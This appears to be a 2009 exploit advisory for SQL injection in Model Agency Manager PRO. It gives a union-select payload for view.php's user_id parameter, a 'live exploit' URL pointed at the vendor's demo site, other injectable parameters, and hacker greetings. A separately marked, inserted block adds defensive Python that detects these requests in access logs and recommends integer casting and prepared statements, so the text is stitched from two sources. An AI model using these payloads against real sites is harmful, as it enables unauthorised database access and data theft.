
# Title : Model Agency Manager Pro (user_id) SQL Injection Vulnerability
# Published : 2009-09-09
# Author : R3d-D3v!L


[~] Type: (view.php user_id) Remote SQL Injection Vulnerability
[~]
[~] Vendor: www.phpmodelagencyscript.com
[~]
[~] Software: Model Agency Manager PRO
[~]
[~] author: ((R3d D3v!L))
[~]
[~] Date: 7.9.2009
[~]
[~] Home: CL0S3D
[~]
[~] contact: X@hotmail.co.jp
[~]-----------------------------{DEV!L'5 of SYST3M}-----------------------------

[~] Exploit:

[~] XxX/view.php?user_id= EV!L !NJECT
[~] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[~] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[~] MORE ER0RR:
photos.php?user_id=((R3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))
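
A defender-side check for the requests listed above, added here as an example and not part of the original advisory: it scans web access log lines for non-numeric values in the id parameters the advisory names. It assumes combined-format access logs and that these ids are always plain integers in normal use; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory; assumption: each carries a numeric id.
NUMERIC_PARAMS = {
    "view.php": "user_id",
    "photos.php": "user_id",
    "motm.php": "user_id",
    "forum_message.php": "id",
}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (script, param, decoded_value) for every non-numeric id value."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = NUMERIC_PARAMS.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes values, so %20union%20select shows up in clear text.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and not re.fullmatch(r"\d{1,10}", value):
                hits.append((script, param, value))
    return hits


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Sep/2009:10:00:01 +0000] "GET /view.php?user_id=12&view=photos HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Sep/2009:10:00:07 +0000] "GET /view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos HTTP/1.1" 200 4890',
    '192.0.2.44 - - [09/Sep/2009:10:00:09 +0000] "GET /forum_message.php?id=7x HTTP/1.1" 200 310',
    '192.0.2.10 - - [09/Sep/2009:10:00:12 +0000] "GET /index.php?user_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for script, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"{script}: non-numeric {param}={value!r}")
```

The same integer-only rule belongs in the application itself: casting these parameters to integers and binding them in prepared statements removes the injection point rather than only detecting its use.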


N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((X))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & {0rashey}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

# www.Syue.com [2009-09-09]